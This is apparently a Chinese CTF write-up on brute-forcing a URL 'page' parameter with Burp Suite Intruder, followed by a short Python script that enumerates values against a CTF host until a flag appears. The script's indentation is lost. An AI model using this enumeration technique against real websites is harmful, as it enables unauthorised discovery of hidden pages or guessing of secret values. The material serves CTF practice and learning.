背景

有时候需要爆破URL参数的情况。这通常是因为某些参数可能被用作密码或者其他敏感信息。在这种情况下,可以使用各种工具进行爆破,例如Burp Suite的Intruder功能。

基本步骤:

  1. 首先,设置浏览器的代理设置,使其流量通过Burp Suite。
  2. 然后,在浏览器中访问目标URL,例如http://ctf.seek2.top:33530/post/post.php?page=1
  3. 找到刚才发送的请求,右键点击它,然后选择”Send to Intruder”。
    4 切换到”Intruder”选项卡。在”Positions”子选项卡中,可以看到被发送到Intruder的请求。Burp Suite会自动标记出可能的爆破位置,可以根据需要添加或删除这些标记。
  4. 切换到”Payloads”子选项卡。可以设置爆破的参数。例如,可以选择一个字典文件,Burp Suite会使用这个文件中的所有词作为参数进行爆破。
  5. 设置好参数后,点击”Start attack”按钮开始爆破。

思路

查看文章详细内容,进入http://ctf.seek2.top:33530/post/post.php?page=1,提示:

或许这篇文章藏了个flag,如果你的page参数正确的话
不过看来page参数不正确呢😣

观察page参数的值是纯数字1,而且首页的输入框中输入数字1也能跳转到该页,并且提示输入的数字在1~1000000,说明是需要爆破找到正确的参数值,可以使用 BurpSuite 模块,也可以使用 Python 编写脚本,下面是一个参考的 exp:

import requests
import re

from tqdm import tqdm

target = "http://ctf.seek2.top:33530"
url = f"{target}/post/post.php"

for i in tqdm(range(100, 1000)):
params = {"page": f"{i}"}
html = requests.get(url, params=params).text
if 'flag{' in html:
print(f"page = {i}")
print(re.findall(r'flag{.*', html))
break